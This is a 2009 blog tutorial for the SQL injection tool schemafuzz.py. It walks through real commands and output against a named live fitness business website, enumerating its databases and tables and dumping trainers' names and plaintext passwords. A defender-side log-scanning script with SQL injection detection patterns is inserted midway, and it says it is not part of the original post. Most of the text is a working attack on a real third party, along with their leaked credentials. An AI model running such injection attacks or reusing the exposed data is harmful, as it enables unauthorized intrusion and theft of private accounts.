schemafuzz tutorial

This tool is used against MySQL databases that have an error.. or in other words, SQL injection! :)

schemafuzz.py journey… begin…

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py -h

Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --dbs       Shows all databases user has access too.                  MySQL v5+
Define: --schema    Enumerate Information_schema Database.                     MySQL v5+
Define: --full      Enumerates all databases information_schema table          MySQL v5+
Define: --dump      Extract information from a Database, Table and Column.     MySQL v4+
Define: --fuzz      Fuzz Tables and Columns.                                   MySQL v4+
Define: --findcol   Finds Columns length of a SQLi                             MySQL v4+
Define: --info      Gets MySQL server configuration only.                      MySQL v4+

Required:
Define: -u        URL "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is schemafuzzlog.txt
Define: -r        row number to start at
Define: -v        Verbosity off option. Will not display row #'s in dump mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --findcol -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8--
[+] Evasion Used: "+" "--"
[+] 01:58:30
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 0
[+] SQLi URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4--
[+] darkc0de URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4
[-] Done!

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --info -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 01:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt

[+] Do we have Access to MySQL Database: No

[+] Do we have Access to Load_File: No

[-] [01:59:58]
[-] Total URL Requests 3
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dbs -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:00:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]ruf_http
[1]test

[-] [02:00:16]
[-] Total URL Requests 4
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --schema -D ruf_http -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:01:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing Tables & Columns from database "ruf_http"
[+] Number of Tables: 6

[Database]: ruf_http
[Table: Columns]
[0]blogs: blogid,title,blog,posted,trainerid
[1]comments: commentid,name,comment,blogid,posted,approved
[2]events: eventid,name,description,date
[3]links: linkid,title,link
[4]testimonials: testimonialid,fname,lname,testimonial
[5]trainers: trainerid,fname,lname,pwd,age,bio

[-] [02:02:12]
[-] Total URL Requests 30
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C pwd -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['pwd']
[+] Number of Rows: 4

[0] Natalie
[1] glasfryn
[2] ella
[3] attack

[-] [02:04:26]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C fname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['fname']
[+] Number of Rows: 4

[0] Natalie
[1] Kathryn
[2] Sarah
[3] Craig

[-] [02:04:51]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py --dump -D ruf_http -T trainers -C lname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4--
[+] Evasion Used: "+" "--"
[+] 02:04:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database "ruf_http" Table "trainers"
[+] Column(s) ['lname']
[+] Number of Rows: 4

[0] Sach
[1] Jones
[2] Stone
[3] O

[-] [02:05:12]
[-] Total URL Requests 6
[-] Done
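A defender-side companion to the sessions above, added here and not part of the original post or of the schemafuzz script: it decodes the query string of each request (undoing the "+" and %XX evasions the tool reports) and flags the request shape the walkthrough produces, the UNION SELECT probe, the AND 1=2 tautology, the trailing comment terminator, and the darkc0de marker string the script places in the null column. The access-log lines and IP addresses are constructed samples, not taken from the page.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Signatures for the UNION-based probe pattern shown in the sessions above.
# Applied to the decoded, lower-cased query string, so case and %XX tricks do not matter.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b")),
    ("tautology_probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+")),
    ("comment_terminator", re.compile(r"(?:--|/\*)\s*$")),
    ("information_schema", re.compile(r"\binformation_schema\b")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
    ("tool_marker", re.compile(r"darkc0de")),  # string the script injects into the null column
]

def normalize_query(url):
    """Decoded, lower-cased query string: 'UNION+SELECT' and 'union%20select' look alike."""
    return unquote_plus(urlsplit(url).query).lower()

def classify_request(url):
    """Names of the signatures that fire on one request URL (empty list = nothing suspicious)."""
    q = normalize_query(url)
    return [name for name, pattern in SIGNATURES if pattern.search(q)]

# Apache combined-format prefix; only the request target is needed for classification.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def scan_log(lines):
    """Yield (ip, target, hits) for each log line whose query string matches a signature."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            yield m.group("ip"), m.group("target"), hits

# Constructed sample log (hypothetical host and client addresses); the third request
# is the page's payload re-encoded with %20 and mixed case to show that decoding matters.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Dec/2009:01:58:30 +0800] "GET /trainers.php?id=8 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Dec/2009:01:58:31 +0800] "GET /trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4-- HTTP/1.1" 200 4870',
    '203.0.113.7 - - [30/Dec/2009:01:59:55 +0800] "GET /trainers.php?id=8%20AnD%201=2%20uNiOn%20sElEcT%20darkc0de,1,2,3,4-- HTTP/1.1" 200 4901',
    '198.51.100.9 - - [30/Dec/2009:02:03:00 +0800] "GET /trainers.php?id=12 HTTP/1.1" 200 5100',
]

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target, ",".join(hits))
```

A single hit on the tautology probe alone is weak evidence; the combination of a tautology, UNION SELECT and a comment terminator from one client within seconds is the pattern worth alerting on.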

Do you guys understand this?

I don't think this thing is that hard..

Anyway, if you don't understand, you can ask me.. :)

p/s: thanks to rsauron from darkc0de for this script.. nice one mate! :)


~ by Zam on December 30, 2009.
